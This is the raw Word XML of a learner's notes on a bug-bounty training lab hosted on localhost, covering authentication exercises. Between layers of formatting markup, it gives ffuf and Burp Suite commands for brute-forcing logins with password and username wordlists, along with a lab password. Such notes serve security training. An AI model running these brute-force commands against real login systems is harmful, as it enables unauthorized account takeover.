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8E3D1" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
          <w:sz w:val="45"/>
        </w:rPr>
        <w:t>TCM Bog Bounty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C897F9" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="474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78D785C9" wp14:editId="7F3475FD">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4185" name="Group 4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5143" name="Shape 5143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5" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 5144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7E7B1D7F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>TCM Bug Bounty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54277C82" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="32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A9F626C" wp14:editId="6F8F9848">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4186" name="Group 4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5145" name="Shape 5145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6" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 5146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09E06C4F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="212"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7C774" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
        <w:ind w:left="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D1F432" wp14:editId="7B920DAF">
                <wp:extent cx="47625" cy="47625"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4198" name="Group 4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8" style="width:3.75pt;height:3.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="476,476">
                <v:shape id="Shape 18" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,604,32925,1812c35843,3021,38418,4742,40651,6975c42883,9207,44604,11782,45812,14700c47021,17617,47625,20655,47625,23813c47625,26970,47021,30008,45812,32925c44604,35842,42883,38418,40651,40650c38418,42883,35843,44604,32925,45812c30008,47021,26970,47625,23813,47625c20655,47625,17617,47021,14700,45812c11783,44604,9207,42883,6975,40650c4742,38418,3021,35842,1813,32925c604,30008,0,26970,0,23813c0,20655,604,17617,1813,14700c3021,11782,4742,9207,6975,6975c9207,4742,11783,3021,14700,1812c17617,604,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="155BDA"/>
          <w:u w:val="single" w:color="155BDA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidR="00AB6EF2">
          <w:rPr>
            <w:color w:val="155BDA"/>
            <w:u w:val="single" w:color="155BDA"/>
          </w:rPr>
          <w:t>http://localhost:80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C9B5BD3" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="63"/>
        <w:ind w:left="393" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Kavishvar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1E675A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="383"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>12/07/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6FA16E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="309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2D23E597" wp14:editId="552BA4CD">
                <wp:extent cx="6581774" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4187" name="Group 4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14300"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="114300"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5147" name="Shape 5147"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="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8" name="Shape 5148"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="952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7" style="width:518.25pt;height:9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,1143">
                <v:shape id="Shape 5149" style="position:absolute;width:65817;height:190;left:0;top:0;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#dddddd"/>
                </v:shape>
                <v:shape id="Shape 5150" style="position:absolute;width:65817;height:190;left:0;top:952;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050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0190BDDD" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>1.Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D0684B" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31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065E293D" wp14:editId="6560B7B0">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4189" name="Group 4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5151" name="Shape 5151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9" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 5152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5E3DCC64" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="702"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6FC70" w14:textId="5A225C80" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="153"/>
        <w:ind w:right="196" w:hanging="2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73D36C" wp14:editId="5882B312">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276982</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4200" name="Group 4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647700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="64770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3812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00" style="width:22.5pt;height:51pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8097pt;" coordsize="2857,6477">
                <v:shape id="Shape 29" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,604,32925,1812c35843,3020,38418,4741,40651,6974c42883,9207,44604,11782,45812,14700c47021,17617,47625,20655,47625,23813c47625,26970,47021,30007,45812,32925c44604,35842,42883,38417,40651,40650c38418,42883,35843,44603,32925,45812c30008,47020,26970,47625,23813,47625c20655,47625,17617,47020,14700,45812c11783,44603,9207,42883,6975,40650c4742,38417,3021,35842,1813,32925c604,30007,0,26970,0,23813c0,20655,604,17617,1813,14699c3021,11782,4742,9207,6975,6974c9207,4741,11783,3020,14700,1812c17617,604,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 30" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30007,45812,32925c44604,35842,42883,38417,40650,40650c38418,42883,35842,44603,32925,45812c30008,47020,26970,47625,23813,47625c20655,47625,17617,47020,14700,45812c11783,44603,9207,42883,6975,40650c4742,38417,3021,35842,1813,32925c604,30007,0,26970,0,23813c0,20655,604,17617,1813,14699c3021,11782,4742,9207,6975,6974c9207,4741,11783,3020,14700,1812c17617,604,20655,0,23813,0c26970,0,30008,604,32925,1812c35842,3020,38418,4741,40650,6974c42883,9207,44604,11782,45812,14699c47021,17617,47625,20655,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 33" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30007,45812,32924c44604,35842,42883,38417,40650,40650c38418,42883,35842,44603,32925,45812c30008,47020,26970,47625,23813,47625c20655,47625,17617,47020,14700,45812c11783,44603,9207,42883,6975,40650c4742,38417,3021,35842,1813,32925c604,30007,0,26970,0,23813c0,20655,604,17617,1813,14699c3021,11782,4742,9207,6975,6974c9207,4741,11783,3021,14700,1812c17617,604,20655,0,23813,0c26970,0,30008,604,32925,1812c35842,3020,38418,4741,40650,6974c42883,9207,44604,11782,45812,14699c47021,17617,47625,20655,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzz using </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Burp suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Secrists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>.(/usr/share/seclists/Passwords)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EFB93" w14:textId="3A387BE5" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="315" w:lineRule="auto"/>
        <w:ind w:right="196" w:hanging="263"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use FUFF</w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>ffuf -request req.txt -request-proto http -w /usr/share/seclists/Passwords/xato-net-10million-passwords-10000.txt -fs 1814</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13261AA9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291C9567" wp14:editId="489C5E6B">
                <wp:extent cx="6581774" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4190" name="Group 4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9050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5157" name="Shape 5157"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="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0" style="width:518.25pt;height:1.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,190">
                <v:shape id="Shape 5158" style="position:absolute;width:65817;height:190;left:0;top:0;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050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37D97A38" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32925B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31DF0C15" wp14:editId="26F845CB">
                <wp:extent cx="6581774" cy="838200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4191" name="Group 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838200"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="838200"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5159" name="Shape 5159"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="8191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5775" y="276983"/>
                            <a:ext cx="5489162" cy="178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DF86F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>We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get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MEA</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:spacing w:val="-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code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(Short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code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user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name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submitted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again)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33375" y="600075"/>
                            <a:ext cx="47625" cy="4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4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4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5775" y="562734"/>
                            <a:ext cx="3961085" cy="178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712A7" w14:textId="60503201" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>Change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user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name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8"/>
                                </w:rPr>
                                <w:t>burp suite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farword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F0C15" id="Group 4191" o:spid="_x0000_s1026" style="width:518.25pt;height:66pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5159" o:spid="_x0000_s1027" style="position:absolute;top:8191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39" o:spid="_x0000_s1028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" path="m23813,v3157,,6195,604,9112,1812c35843,3020,38418,4741,40651,6974v2232,2232,3953,4807,5161,7725c47021,17616,47625,20654,47625,23813v,3157,-604,6194,-1813,9112c44604,35842,42883,38417,40651,40650v-2233,2233,-4808,3953,-7726,5162c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1813c11783,44603,9207,42883,6975,40650,4742,38417,3021,35842,1813,32925,604,30007,,26970,,23813,,20654,604,17616,1813,14699,3021,11781,4742,9206,6975,6974,9207,4741,11783,3020,14700,1812,17617,604,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 40" o:spid="_x0000_s1029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" path="m47625,23813v,3156,-604,6193,-1813,9111c44604,35841,42883,38416,40650,40649v-2232,2234,-4808,3954,-7725,5162c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1814c11783,44603,9207,42883,6975,40649,4742,38416,3021,35841,1813,32924,604,30006,,26969,,23813,,20653,604,17616,1813,14699,3021,11781,4742,9206,6975,6973,9207,4741,11783,3020,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3020,38418,4741,40650,6973v2233,2233,3954,4808,5162,7726c47021,17616,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 41" o:spid="_x0000_s1030" style="position:absolute;left:4857;top:2769;width:548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7DDF86F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>We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get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MEA</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/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code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(Short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code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user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name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submitted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again)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 42" o:spid="_x0000_s1031" style="position:absolute;left:3333;top:6000;width:477;height:476;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="47625,47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" path="m47625,23813v,3156,-604,6194,-1813,9111c44604,35840,42883,38416,40650,40649v-2232,2233,-4808,3954,-7725,5162c30008,47020,26970,47624,23813,47624v-3158,,-6196,-604,-9113,-1813c11783,44603,9207,42882,6975,40649,4742,38416,3021,35840,1813,32924,604,30007,,26969,,23813,,20655,604,17616,1813,14699,3021,11781,4742,9206,6975,6974,9207,4741,11783,3020,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3020,38418,4741,40650,6974v2233,2232,3954,4807,5162,7725c47021,17616,47625,20655,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47624"/>
                </v:shape>
                <v:rect id="Rectangle 43" o:spid="_x0000_s1032" style="position:absolute;left:4857;top:5627;width:3961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90712A7" w14:textId="60503201" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>Change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user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name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8"/>
                          </w:rPr>
                          <w:t>burp suite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farword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258900" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="702"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305739C" w14:textId="0C2445EC" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:lef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8B5EDB" wp14:editId="58C2B047">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276982</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="1219200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4201" name="Group 4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1219200"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="121920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3812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3812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38125" y="11715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01" style="width:22.5pt;height:96pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8097pt;" coordsize="2857,12192">
                <v:shape id="Shape 45" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,604,32925,1812c35843,3020,38418,4741,40651,6974c42883,9207,44604,11782,45812,14698c47021,17617,47625,20655,47625,23813c47625,26970,47021,30007,45812,32924c44604,35842,42883,38417,40651,40650c38418,42883,35843,44603,32925,45811c30008,47020,26970,47624,23813,47625c20655,47624,17617,47020,14700,45811c11783,44603,9207,42883,6975,40650c4742,38417,3021,35842,1813,32925c604,30007,0,26970,0,23813c0,20655,604,17617,1813,14699c3021,11782,4742,9207,6975,6974c9207,4741,11783,3020,14700,1812c17617,604,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 46" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30007,45812,32925c44604,35842,42883,38418,40650,40650c38418,42883,35842,44603,32925,45812c30008,47020,26970,47624,23813,47625c20655,47624,17617,47020,14700,45812c11783,44603,9207,42883,6975,40650c4742,38418,3021,35842,1813,32925c604,30007,0,26970,0,23813c0,20655,604,17617,1813,14699c3021,11782,4742,9207,6975,6974c9207,4741,11783,3020,14700,1812c17617,604,20655,0,23813,0c26970,0,30008,604,32925,1812c35842,3020,38418,4741,40650,6974c42883,9207,44604,11782,45812,14698c47021,17617,47625,20655,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 48" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30007,45812,32924c44604,35841,42883,38417,40650,40650c38418,42883,35842,44603,32925,45811c30008,47020,26970,47624,23813,47625c20655,47624,17617,47020,14700,45811c11783,44603,9207,42883,6975,40650c4742,38417,3021,35841,1813,32924c604,30007,0,26970,0,23813c0,20654,604,17617,1813,14699c3021,11781,4742,9206,6975,6973c9207,4741,11783,3020,14700,1812c17617,604,20655,0,23813,0c26970,0,30008,604,32925,1812c35842,3020,38418,4741,40650,6973c42883,9206,44604,11781,45812,14698c47021,17617,47625,20654,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 50" style="position:absolute;width:476;height:476;left:2381;top:8858;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30007,45812,32924c44604,35841,42883,38417,40650,40650c38418,42883,35842,44603,32925,45812c30008,47020,26970,47624,23813,47625c20655,47624,17617,47020,14700,45812c11783,44603,9207,42883,6975,40650c4742,38417,3021,35841,1813,32924c604,30007,0,26970,0,23813c0,20655,604,17617,1813,14699c3021,11782,4742,9208,6975,6975c9207,4742,11783,3020,14700,1812c17617,604,20655,0,23813,0c26970,0,30008,604,32925,1812c35842,3020,38418,4742,40650,6975c42883,9208,44604,11782,45812,14699c47021,17617,47625,20655,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 52" style="position:absolute;width:476;height:476;left:2381;top:11715;" coordsize="47625,47625" path="m47625,23813c47625,26970,47021,30007,45812,32924c44604,35841,42883,38416,40650,40650c38418,42883,35842,44603,32925,45811c30008,47020,26970,47624,23813,47625c20655,47624,17617,47020,14700,45811c11783,44603,9207,42883,6975,40650c4742,38416,3021,35841,1813,32924c604,30007,0,26970,0,23813c0,20654,604,17617,1813,14698c3021,11781,4742,9206,6975,6974c9207,4741,11783,3020,14700,1812c17617,604,20655,0,23813,0c26970,0,30008,604,32925,1812c35842,3020,38418,4741,40650,6974c42883,9206,44604,11781,45812,14698c47021,17617,47625,20654,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost/init.php if the lab </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>breaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> as there are rules </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>brute Forse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330DA67" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="393" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="5603" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Use cluster bomber in burp. user:admin pass:letmein.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243753C6" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="315" w:lineRule="auto"/>
        <w:ind w:left="760" w:right="392" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>ffuf -request req2.txt -request-proto http -mode clusterbomd -w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799588CD" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="315" w:lineRule="auto"/>
        <w:ind w:left="760" w:right="392" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>/use/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSER -w pass.txt:PUZZPASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE1150" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0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3FF180E4" wp14:editId="2EEA704A">
                <wp:extent cx="6581774" cy="552450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4195" name="Group 4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552450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="552450"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5245" name="Shape 5245"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="53340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5775" y="276983"/>
                            <a:ext cx="253136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804A4" w14:textId="68374664" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>We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can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use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8"/>
                                </w:rPr>
                                <w:t>authors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wiki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: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3" name="Rectangle 3833"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2389138" y="276983"/>
                            <a:ext cx="242633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90994" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="108"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>htt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5" name="Rectangle 3835"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2571569" y="276983"/>
                            <a:ext cx="11607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E1096" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId6">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="117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6" name="Rectangle 3836"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2658842" y="276983"/>
                            <a:ext cx="496307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372F6" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="110"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>s://ap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8" name="Rectangle 3838"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3032005" y="276983"/>
